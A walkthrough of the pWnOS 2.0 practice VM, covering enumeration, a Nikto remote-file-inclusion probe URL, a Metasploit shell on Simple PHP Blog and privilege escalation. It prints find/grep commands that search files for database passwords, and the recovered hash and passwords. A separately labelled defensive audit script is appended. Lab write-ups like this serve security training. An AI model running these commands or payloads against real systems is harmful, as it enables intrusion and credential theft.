PWNOS: 2.0 (PRE-RELEASE) Walkthrough

pWnOS v2.0 is a virtual machine image that hosts a server for practicing penetration testing. It will test your ability to exploit the server and contains multiple entry points to reach the goal (root). It was designed to be used with VMware Workstation 7.0, but can also be used with most other virtual machine software.

For set-up:

Enumeration

Possibilities:

  1. Get some usernames and brute-force through SSH.
  2. Possible CMS with vulnerability.
  3. Website with SQLi or LFI or RCE.

More Enumeration…

📌 OS: Debian Ubuntu

  1. SSH

Possible User Enumeration.

  2. HTTP

  • Manual Testing (3-steps)

http://10.10.10.100/activate.php?x=test%40gmail.com&y=c0a4235e2ee6cff3a543dcfdfb6a3e2c

This seems worth a deeper look 🔑
  • Nikto Scan
/info.php?file=http://cirt.net/rfiinc.txt?

http://ha.ckers.org/weird/rfi-locations.dat

  • Gobuster
It’s SPHPBlog 🤔
It is Simple PHP Blog 0.4.0

10.10.10.100/blog/comments.php?y=11&m=05&entry=entry110509-191340

Finding POI (Point Of Intrusion)

The blog version is Simple PHP Blog 0.4.0

Using Metasploit…

Got the reverse shell…

🤓

Privilege Escalation

Use the following to find the PHP/MySQL password:

  • find / -type f -exec grep -ln "sql.connect" {} \; 2>/dev/null
  • find / -type f -exec grep -l -n "DB_PASSWORD" {} \; 2>/dev/null

Credentials:

  1. Dan:c2c4b4e51d9e23c02c15702c136c3e950ba9a4af

After cracking the hash,

Dan:killerbeesareflying

However, that did not work with SSH.

Let’s try root:

DEFINE ('DB_USER', 'root');
DEFINE ('DB_PASSWORD', 'root@ISIntS');
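The defensive counterpart to the find commands above, as an added example that is not part of the original walkthrough: it audits a web root for PHP files that hardcode DB_PASSWORD and flags the ones that are world-readable or connect as the database root user. The function name, flag labels and sample file names are assumptions made for illustration.

```shell
#!/bin/sh
# Added example (not from the walkthrough): audit a web root for PHP files
# that hardcode database credentials, the files the find/grep above locates.

# audit_db_creds DIR -> one line per finding: "<flags> <path>"
audit_db_creds() {
    root=$1
    find "$root" -type f -name '*.php' -exec grep -l "DB_PASSWORD" {} \; 2>/dev/null |
    while IFS= read -r f; do
        flags=""
        # Mode grants read to "other": every local account can read the secret.
        if [ -n "$(find "$f" -perm -004 2>/dev/null)" ]; then
            flags="world-readable"
        fi
        # Application connects as the database superuser instead of a scoped account.
        if grep -Eiq "define *\( *['\"]DB_USER['\"] *, *['\"]root['\"]" "$f"; then
            flags="${flags:+$flags,}db-user-root"
        fi
        printf '%s %s\n' "${flags:-hardcoded-only}" "$f"
    done
}

# demo: build a constructed sample web root and audit it.
demo() {
    d=$(mktemp -d)
    # Constructed files; names and values are placeholders, not from the target.
    printf "<?php\nDEFINE ('DB_USER', 'root');\nDEFINE ('DB_PASSWORD', 'PLACEHOLDER');\n" > "$d/db_config.php"
    chmod 644 "$d/db_config.php"
    printf "<?php\ndefine('DB_USER', 'blog_app');\ndefine('DB_PASSWORD', 'PLACEHOLDER');\n" > "$d/scoped.php"
    chmod 640 "$d/scoped.php"
    audit_db_creds "$d"
    rm -rf "$d"
}

demo
```

Files flagged db-user-root should be moved to a dedicated database account with only the privileges the application needs, and the config file restricted to the web server's user or group.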

What could be more fun than breaking stuff!!!